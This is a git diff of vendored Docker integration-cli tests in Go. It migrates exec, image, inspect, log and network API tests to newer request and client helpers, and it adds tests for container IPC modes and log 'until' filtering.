waitForExec(c, id) + + waitAndAssert(c, 5*time.Second, checkReadDir, checker.Equals, len(fi)) + + id = createExecCmd(c, name, "invalid") + startExec(c, id, http.StatusBadRequest) + waitForExec(c, id) + + waitAndAssert(c, 5*time.Second, checkReadDir, checker.Equals, len(fi)) + + dockerCmd(c, "stop", name) + _, err = os.Stat(stateDir) + c.Assert(err, checker.NotNil) + c.Assert(os.IsNotExist(err), checker.True) +} + func createExec(c *check.C, name string) string { - _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) - c.Assert(err, checker.IsNil, check.Commentf(string(b))) + return createExecCmd(c, name, "true") +} +func createExecCmd(c *check.C, name string, cmd string) string { + _, reader, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.JSONBody(map[string]interface{}{"Cmd": []string{cmd}})) + c.Assert(err, checker.IsNil) + b, err := ioutil.ReadAll(reader) + c.Assert(err, checker.IsNil) + defer reader.Close() createResp := struct { ID string `json:"Id"` }{} @@ -179,17 +268,43 @@ func createExec(c *check.C, name string) string { } func startExec(c *check.C, id string, code int) { - resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + resp, body, err := request.Post(fmt.Sprintf("/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.JSON) c.Assert(err, checker.IsNil) - b, err := readBody(body) + b, err := request.ReadBody(body) comment := check.Commentf("response body: %s", b) c.Assert(err, checker.IsNil, comment) c.Assert(resp.StatusCode, checker.Equals, code, comment) } func inspectExec(c *check.C, id string, out interface{}) { - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/exec/%s/json", id), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/exec/%s/json", id)) + c.Assert(err, checker.IsNil) + defer body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + err = json.NewDecoder(body).Decode(out) + c.Assert(err, checker.IsNil) +} + +func waitForExec(c *check.C, id string) { + timeout := time.After(60 * time.Second) + var execJSON struct{ Running bool } + for { + select { + case <-timeout: + c.Fatal("timeout waiting for exec to start") + default: + } + + inspectExec(c, id, &execJSON) + if !execJSON.Running { + break + } + } +} + +func inspectContainer(c *check.C, id string, out interface{}) { + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/json", id)) c.Assert(err, checker.IsNil) defer body.Close() c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go index b7617eae25..da1c8c8f28 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go @@ -1,33 +1,40 @@ package main import ( - "encoding/json" + "context" "net/http" - "net/url" + "net/http/httptest" "strings" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) func (s *DockerSuite) TestAPIImagesFilter(c *check.C) { + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + name := "utest:tag1" name2 := "utest/docker:tag2" name3 := "utest:5000/docker:tag3" for _, n := range []string{name, name2, name3} { dockerCmd(c, "tag", "busybox", n) } - type image types.ImageSummary - getImages := func(filter string) []image { - v := url.Values{} - v.Set("filter", filter) - status, b, err := sockRequest("GET", "/images/json?"+v.Encode(), nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var images []image - err = json.Unmarshal(b, &images) + getImages := func(filter string) []types.ImageSummary { + filters := filters.NewArgs() + filters.Add("reference", filter) + options := types.ImageListOptions{ + All: false, + Filters: filters, + } + images, err := cli.ImageList(context.Background(), options) c.Assert(err, checker.IsNil) return images @@ -48,80 +55,106 @@ func (s *DockerSuite) TestAPIImagesFilter(c *check.C) { } func (s *DockerSuite) TestAPIImagesSaveAndLoad(c *check.C) { - // TODO Windows to Windows CI: Investigate further why this test fails. testRequires(c, Network) - testRequires(c, DaemonIsLinux) - out, err := buildImage("saveandload", "FROM busybox\nENV FOO bar", false) - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + buildImageSuccessfully(c, "saveandload", build.WithDockerfile("FROM busybox\nENV FOO bar")) + id := getIDByName(c, "saveandload") - res, body, err := sockRequestRaw("GET", "/images/"+id+"/get", nil, "") + res, body, err := request.Get("/images/" + id + "/get") c.Assert(err, checker.IsNil) defer body.Close() c.Assert(res.StatusCode, checker.Equals, http.StatusOK) dockerCmd(c, "rmi", id) - res, loadBody, err := sockRequestRaw("POST", "/images/load", body, "application/x-tar") + res, loadBody, err := request.Post("/images/load", request.RawContent(body), request.ContentType("application/x-tar")) c.Assert(err, checker.IsNil) defer loadBody.Close() c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - inspectOut := inspectField(c, id, "Id") + inspectOut := cli.InspectCmd(c, id, cli.Format(".Id")).Combined() c.Assert(strings.TrimSpace(string(inspectOut)), checker.Equals, id, check.Commentf("load did not work properly")) } func (s *DockerSuite) TestAPIImagesDelete(c *check.C) { - if daemonPlatform != "windows" { + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + if testEnv.OSType != "windows" { testRequires(c, Network) } name := "test-api-images-delete" - out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV FOO bar")) + id := getIDByName(c, name) dockerCmd(c, "tag", name, "test:tag1") - status, _, err := sockRequest("DELETE", "/images/"+id, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict) + _, err = cli.ImageRemove(context.Background(), id, types.ImageRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "unable to delete") - status, _, err = sockRequest("DELETE", "/images/test:noexist", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) //Status Codes:404 – no such image + _, err = cli.ImageRemove(context.Background(), "test:noexist", types.ImageRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "No such image") - status, _, err = sockRequest("DELETE", "/images/test:tag1", nil) + _, err = cli.ImageRemove(context.Background(), "test:tag1", types.ImageRemoveOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) } func (s *DockerSuite) TestAPIImagesHistory(c *check.C) { - if daemonPlatform != "windows" { + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + if testEnv.OSType != "windows" { testRequires(c, Network) } name := "test-api-images-history" - out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV FOO bar")) + id := getIDByName(c, name) + + historydata, err := cli.ImageHistory(context.Background(), id) c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + c.Assert(historydata, checker.Not(checker.HasLen), 0) + var found bool + for _, tag := range historydata[0].Tags { + if tag == "test-api-images-history:latest" { + found = true + break + } + } + c.Assert(found, checker.True) +} - status, body, err := sockRequest("GET", "/images/"+id+"/history", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) +func (s *DockerSuite) TestAPIImagesImportBadSrc(c *check.C) { + testRequires(c, Network, SameHostDaemon) - var historydata []types.ImageHistory - err = json.Unmarshal(body, &historydata) - c.Assert(err, checker.IsNil, check.Commentf("Error on unmarshal")) + server := httptest.NewServer(http.NewServeMux()) + defer server.Close() + + tt := []struct { + statusExp int + fromSrc string + }{ + {http.StatusNotFound, server.URL + "/nofile.tar"}, + {http.StatusNotFound, strings.TrimPrefix(server.URL, "http://") + "/nofile.tar"}, + {http.StatusNotFound, strings.TrimPrefix(server.URL, "http://") + "%2Fdata%2Ffile.tar"}, + {http.StatusInternalServerError, "%2Fdata%2Ffile.tar"}, + } + + for _, te := range tt { + res, _, err := request.Post(strings.Join([]string{"/images/create?fromSrc=", te.fromSrc}, ""), request.JSON) + c.Assert(err, check.IsNil) + c.Assert(res.StatusCode, checker.Equals, te.statusExp) + c.Assert(res.Header.Get("Content-Type"), checker.Equals, "application/json") + } - c.Assert(historydata, checker.Not(checker.HasLen), 0) - c.Assert(historydata[0].Tags[0], checker.Equals, "test-api-images-history:latest") } // #14846 func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) { testRequires(c, Network) - res, b, err := sockRequestRaw("GET", "/images/search?term=test", nil, "application/json") + res, b, err := request.Get("/images/search?term=test", request.JSON) c.Assert(err, check.IsNil) b.Close() c.Assert(res.StatusCode, checker.Equals, http.StatusOK) @@ -131,32 +164,21 @@ func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) { // Test case for 30027: image size reported as -1 in v1.12 client against v1.13 daemon. // This test checks to make sure both v1.12 and v1.13 client against v1.13 daemon get correct `Size` after the fix. func (s *DockerSuite) TestAPIImagesSizeCompatibility(c *check.C) { - status, b, err := sockRequest("GET", "/images/json", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var images []types.ImageSummary - err = json.Unmarshal(b, &images) + apiclient := testEnv.APIClient() + defer apiclient.Close() + + images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{}) c.Assert(err, checker.IsNil) c.Assert(len(images), checker.Not(checker.Equals), 0) for _, image := range images { c.Assert(image.Size, checker.Not(checker.Equals), int64(-1)) } - type v124Image struct { - ID string `json:"Id"` - ParentID string `json:"ParentId"` - RepoTags []string - RepoDigests []string - Created int64 - Size int64 - VirtualSize int64 - Labels map[string]string - } - status, b, err = sockRequest("GET", "/v1.24/images/json", nil) + apiclient, err = client.NewClientWithOpts(client.FromEnv, client.WithVersion("v1.24")) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var v124Images []v124Image - err = json.Unmarshal(b, &v124Images) + defer apiclient.Close() + + v124Images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{}) c.Assert(err, checker.IsNil) c.Assert(len(v124Images), checker.Not(checker.Equals), 0) for _, image := range v124Images { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go deleted file mode 100644 index 1556099734..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go +++ /dev/null @@ -1,53 +0,0 @@ -package main - -import ( - "net/http" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestInfoAPI(c *check.C) { - endpoint := "/info" - - status, body, err := sockRequest("GET", endpoint, nil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(err, checker.IsNil) - - // always shown fields - stringsToCheck := []string{ - "ID", - "Containers", - "ContainersRunning", - "ContainersPaused", - "ContainersStopped", - "Images", - "LoggingDriver", - "OperatingSystem", - "NCPU", - "OSType", - "Architecture", - "MemTotal", - "KernelVersion", - "Driver", - "ServerVersion", - "SecurityOptions"} - - out := string(body) - for _, linePrefix := range stringsToCheck { - c.Assert(out, checker.Contains, linePrefix) - } -} - -func (s *DockerSuite) TestInfoAPIVersioned(c *check.C) { - testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later - endpoint := "/v1.20/info" - - status, body, err := sockRequest("GET", endpoint, nil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(err, checker.IsNil) - - out := string(body) - c.Assert(out, checker.Contains, "ExecutionDriver") - c.Assert(out, checker.Contains, "not supported") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go index 546b224c92..68055b6c14 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go @@ -1,15 +1,17 @@ package main import ( + "context" "encoding/json" - "net/http" "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions/v1p20" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) { @@ -26,7 +28,7 @@ func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) { var cases []acase - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { cases = []acase{ {"v1.25", append(keysBase, "Mounts")}, } @@ -105,20 +107,16 @@ func (s *DockerSuite) TestInspectAPIContainerVolumeDriver(c *check.C) { func (s *DockerSuite) TestInspectAPIImageResponse(c *check.C) { dockerCmd(c, "tag", "busybox:latest", "busybox:mytag") + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - endpoint := "/images/busybox/json" - status, body, err := sockRequest("GET", endpoint, nil) - + imageJSON, _, err := cli.ImageInspectWithRaw(context.Background(), "busybox") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var imageJSON types.ImageInspect - err = json.Unmarshal(body, &imageJSON) - c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for latest version")) c.Assert(imageJSON.RepoTags, checker.HasLen, 2) - - c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:latest"), checker.Equals, true) - c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:mytag"), checker.Equals, true) + assert.Check(c, is.Contains(imageJSON.RepoTags, "busybox:latest")) + assert.Check(c, is.Contains(imageJSON.RepoTags, "busybox:mytag")) } // #17131, #17139, #17173 diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go deleted file mode 100644 index f49a139c28..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go +++ /dev/null @@ -1,35 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - "fmt" - "net/http" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// #16665 -func (s *DockerSuite) TestInspectAPICpusetInConfigPre120(c *check.C) { - testRequires(c, DaemonIsLinux) - testRequires(c, cgroupCpuset) - - name := "cpusetinconfig-pre120" - dockerCmd(c, "run", "--name", name, "--cpuset-cpus", "0", "busybox", "true") - - status, body, err := sockRequest("GET", fmt.Sprintf("/v1.19/containers/%s/json", name), nil) - c.Assert(status, check.Equals, http.StatusOK) - c.Assert(err, check.IsNil) - - var inspectJSON map[string]interface{} - err = json.Unmarshal(body, &inspectJSON) - c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal body for version 1.19")) - - config, ok := inspectJSON["Config"] - c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) - cfg := config.(map[string]interface{}) - _, ok = cfg["Cpuset"] - c.Assert(ok, checker.True, check.Commentf("API version 1.19 expected to include Cpuset in 'Config'")) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go new file mode 100644 index 0000000000..886ff88d20 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go @@ -0,0 +1,213 @@ +// build +linux +package main + +import ( + "bufio" + "context" + "fmt" + "io/ioutil" + "os" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/go-check/check" +) + +/* testIpcCheckDevExists checks whether a given mount (identified by its + * major:minor pair from /proc/self/mountinfo) exists on the host system. + * + * The format of /proc/self/mountinfo is like: + * + * 29 23 0:24 / /dev/shm rw,nosuid,nodev shared:4 - tmpfs tmpfs rw + * ^^^^\ + * - this is the minor:major we look for + */ +func testIpcCheckDevExists(mm string) (bool, error) { + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return false, err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + fields := strings.Fields(s.Text()) + if len(fields) < 7 { + continue + } + if fields[2] == mm { + return true, nil + } + } + + return false, s.Err() +} + +// testIpcNonePrivateShareable is a helper function to test "none", +// "private" and "shareable" modes. +func testIpcNonePrivateShareable(c *check.C, mode string, mustBeMounted bool, mustBeShared bool) { + cfg := container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + } + hostCfg := container.HostConfig{ + IpcMode: container.IpcMode(mode), + } + ctx := context.Background() + + client := testEnv.APIClient() + + resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + + err = client.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}) + c.Assert(err, checker.IsNil) + + // get major:minor pair for /dev/shm from container's /proc/self/mountinfo + cmd := "awk '($5 == \"/dev/shm\") {printf $3}' /proc/self/mountinfo" + mm := cli.DockerCmd(c, "exec", "-i", resp.ID, "sh", "-c", cmd).Combined() + if !mustBeMounted { + c.Assert(mm, checker.Equals, "") + // no more checks to perform + return + } + c.Assert(mm, checker.Matches, "^[0-9]+:[0-9]+$") + + shared, err := testIpcCheckDevExists(mm) + c.Assert(err, checker.IsNil) + c.Logf("[testIpcPrivateShareable] ipcmode: %v, ipcdev: %v, shared: %v, mustBeShared: %v\n", mode, mm, shared, mustBeShared) + c.Assert(shared, checker.Equals, mustBeShared) +} + +/* TestAPIIpcModeNone checks the container "none" IPC mode + * (--ipc none) works as expected. It makes sure there is no + * /dev/shm mount inside the container. + */ +func (s *DockerSuite) TestAPIIpcModeNone(c *check.C) { + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.32")) + testIpcNonePrivateShareable(c, "none", false, false) +} + +/* TestAPIIpcModePrivate checks the container private IPC mode + * (--ipc private) works as expected. It gets the minor:major pair + * of /dev/shm mount from the container, and makes sure there is no + * such pair on the host. + */ +func (s *DockerSuite) TestAPIIpcModePrivate(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testIpcNonePrivateShareable(c, "private", true, false) +} + +/* TestAPIIpcModeShareable checks the container shareable IPC mode + * (--ipc shareable) works as expected. It gets the minor:major pair + * of /dev/shm mount from the container, and makes sure such pair + * also exists on the host. + */ +func (s *DockerSuite) TestAPIIpcModeShareable(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testIpcNonePrivateShareable(c, "shareable", true, true) +} + +// testIpcContainer is a helper function to test --ipc container:NNN mode in various scenarios +func testIpcContainer(s *DockerSuite, c *check.C, donorMode string, mustWork bool) { + cfg := container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + } + hostCfg := container.HostConfig{ + IpcMode: container.IpcMode(donorMode), + } + ctx := context.Background() + + client := testEnv.APIClient() + + // create and start the "donor" container + resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + name1 := resp.ID + + err = client.ContainerStart(ctx, name1, types.ContainerStartOptions{}) + c.Assert(err, checker.IsNil) + + // create and start the second container + hostCfg.IpcMode = container.IpcMode("container:" + name1) + resp, err = client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + name2 := resp.ID + + err = client.ContainerStart(ctx, name2, types.ContainerStartOptions{}) + if !mustWork { + // start should fail with a specific error + c.Assert(err, checker.NotNil) + c.Assert(fmt.Sprintf("%v", err), checker.Contains, "non-shareable IPC") + // no more checks to perform here + return + } + + // start should succeed + c.Assert(err, checker.IsNil) + + // check that IPC is shared + // 1. create a file in the first container + cli.DockerCmd(c, "exec", name1, "sh", "-c", "printf covfefe > /dev/shm/bar") + // 2. check it's the same file in the second one + out := cli.DockerCmd(c, "exec", "-i", name2, "cat", "/dev/shm/bar").Combined() + c.Assert(out, checker.Matches, "^covfefe$") +} + +/* TestAPIIpcModeShareableAndContainer checks that a container created with + * --ipc container:ID can use IPC of another shareable container. + */ +func (s *DockerSuite) TestAPIIpcModeShareableAndContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testIpcContainer(s, c, "shareable", true) +} + +/* TestAPIIpcModePrivateAndContainer checks that a container created with + * --ipc container:ID can NOT use IPC of another private container. + */ +func (s *DockerSuite) TestAPIIpcModePrivateAndContainer(c *check.C) { + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.32")) + testIpcContainer(s, c, "private", false) +} + +/* TestAPIIpcModeHost checks that a container created with --ipc host + * can use IPC of the host system. + */ +func (s *DockerSuite) TestAPIIpcModeHost(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + cfg := container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + } + hostCfg := container.HostConfig{ + IpcMode: container.IpcMode("host"), + } + ctx := context.Background() + + client := testEnv.APIClient() + resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + name := resp.ID + + err = client.ContainerStart(ctx, name, types.ContainerStartOptions{}) + c.Assert(err, checker.IsNil) + + // check that IPC is shared + // 1. create a file inside container + cli.DockerCmd(c, "exec", name, "sh", "-c", "printf covfefe > /dev/shm/."+name) + // 2. check it's the same on the host + bytes, err := ioutil.ReadFile("/dev/shm/." + name) + c.Assert(err, checker.IsNil) + c.Assert(string(bytes), checker.Matches, "^covfefe$") + // 3. clean up + cli.DockerCmd(c, "exec", name, "rm", "-f", "/dev/shm/."+name) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go index 2e8ffa9bdc..e809b46c2f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go @@ -3,12 +3,20 @@ package main import ( "bufio" "bytes" + "context" "fmt" + "io" + "io/ioutil" "net/http" + "strconv" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/stdcopy" "github.com/go-check/check" ) @@ -19,34 +27,31 @@ func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) { type logOut struct { out string - res *http.Response err error } + chLog := make(chan logOut) + res, body, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1×tamps=1", id)) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) go func() { - res, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1×tamps=1", id), nil, "") - if err != nil { - chLog <- logOut{"", nil, err} - return - } defer body.Close() out, err := bufio.NewReader(body).ReadString('\n') if err != nil { - chLog <- logOut{"", nil, err} + chLog <- logOut{"", err} return } - chLog <- logOut{strings.TrimSpace(out), res, err} + chLog <- logOut{strings.TrimSpace(out), err} }() select { case l := <-chLog: c.Assert(l.err, checker.IsNil) - c.Assert(l.res.StatusCode, checker.Equals, http.StatusOK) if !strings.HasSuffix(l.out, "hello") { c.Fatalf("expected log output to container 'hello', but it does not") } - case <-time.After(20 * time.Second): + case <-time.After(30 * time.Second): c.Fatal("timeout waiting for logs to exit") } } @@ -54,13 +59,13 @@ func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) { func (s *DockerSuite) TestLogsAPINoStdoutNorStderr(c *check.C) { name := "logs_test" dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") - - status, body, err := sockRequest("GET", fmt.Sprintf("/containers/%s/logs", name), nil) - c.Assert(status, checker.Equals, http.StatusBadRequest) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) + defer cli.Close() + _, err = cli.ContainerLogs(context.Background(), name, types.ContainerLogsOptions{}) expected := "Bad parameters: you must choose at least one stream" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + c.Assert(err.Error(), checker.Contains, expected) } // Regression test for #12704 @@ -69,7 +74,7 @@ func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) { t0 := time.Now() dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "sleep", "10") - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + _, body, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name)) t1 := time.Now() c.Assert(err, checker.IsNil) body.Close() @@ -81,7 +86,131 @@ func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) { func (s *DockerSuite) TestLogsAPIContainerNotFound(c *check.C) { name := "nonExistentContainer" - resp, _, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + resp, _, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name)) c.Assert(err, checker.IsNil) c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) } + +func (s *DockerSuite) TestLogsAPIUntilFutureFollow(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "logsuntilfuturefollow" + dockerCmd(c, "run", "-d", "--name", name, "busybox", "/bin/sh", "-c", "while true; do date +%s; sleep 1; done") + c.Assert(waitRun(name), checker.IsNil) + + untilSecs := 5 + untilDur, err := time.ParseDuration(fmt.Sprintf("%ds", untilSecs)) + c.Assert(err, checker.IsNil) + until := daemonTime(c).Add(untilDur) + + client, err := client.NewEnvClient() + if err != nil { + c.Fatal(err) + } + + cfg := types.ContainerLogsOptions{Until: until.Format(time.RFC3339Nano), Follow: true, ShowStdout: true, Timestamps: true} + reader, err := client.ContainerLogs(context.Background(), name, cfg) + c.Assert(err, checker.IsNil) + + type logOut struct { + out string + err error + } + + chLog := make(chan logOut) + + go func() { + bufReader := bufio.NewReader(reader) + defer reader.Close() + for i := 0; i < untilSecs; i++ { + out, _, err := bufReader.ReadLine() + if err != nil { + if err == io.EOF { + return + } + chLog <- logOut{"", err} + return + } + + chLog <- logOut{strings.TrimSpace(string(out)), err} + } + }() + + for i := 0; i < untilSecs; i++ { + select { + case l := <-chLog: + c.Assert(l.err, checker.IsNil) + i, err := strconv.ParseInt(strings.Split(l.out, " ")[1], 10, 64) + c.Assert(err, checker.IsNil) + c.Assert(time.Unix(i, 0).UnixNano(), checker.LessOrEqualThan, until.UnixNano()) + case <-time.After(20 * time.Second): + c.Fatal("timeout waiting for logs to exit") + } + } +} + +func (s *DockerSuite) TestLogsAPIUntil(c *check.C) { + testRequires(c, MinimumAPIVersion("1.34")) + name := "logsuntil" + dockerCmd(c, "run", "--name", name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do echo log$i; sleep 1; done") + + client, err := client.NewEnvClient() + if err != nil { + c.Fatal(err) + } + + extractBody := func(c *check.C, cfg types.ContainerLogsOptions) []string { + reader, err := client.ContainerLogs(context.Background(), name, cfg) + c.Assert(err, checker.IsNil) + + actualStdout := new(bytes.Buffer) + actualStderr := ioutil.Discard + _, err = stdcopy.StdCopy(actualStdout, actualStderr, reader) + c.Assert(err, checker.IsNil) + + return strings.Split(actualStdout.String(), "\n") + } + + // Get timestamp of second log line + allLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true}) + c.Assert(len(allLogs), checker.GreaterOrEqualThan, 3) + + t, err := time.Parse(time.RFC3339Nano, strings.Split(allLogs[1], " ")[0]) + c.Assert(err, checker.IsNil) + until := t.Format(time.RFC3339Nano) + + // Get logs until the timestamp of second line, i.e. first two lines + logs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true, Until: until}) + + // Ensure log lines after cut-off are excluded + logsString := strings.Join(logs, "\n") + c.Assert(logsString, checker.Not(checker.Contains), "log3", check.Commentf("unexpected log message returned, until=%v", until)) +} + +func (s *DockerSuite) TestLogsAPIUntilDefaultValue(c *check.C) { + name := "logsuntildefaultval" + dockerCmd(c, "run", "--name", name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do echo log$i; done") + + client, err := client.NewEnvClient() + if err != nil { + c.Fatal(err) + } + + extractBody := func(c *check.C, cfg types.ContainerLogsOptions) []string { + reader, err := client.ContainerLogs(context.Background(), name, cfg) + c.Assert(err, checker.IsNil) + + actualStdout := new(bytes.Buffer) + actualStderr := ioutil.Discard + _, err = stdcopy.StdCopy(actualStdout, actualStderr, reader) + c.Assert(err, checker.IsNil) + + return strings.Split(actualStdout.String(), "\n") + } + + // Get timestamp of second log line + allLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true}) + + // Test with default value specified and parameter omitted + defaultLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true, Until: "0"}) + c.Assert(defaultLogs, checker.DeepEquals, allLogs) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go index 1cc66f0900..9c22cb7e3a 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go @@ -11,7 +11,9 @@ import ( "github.com/docker/docker/api/types" 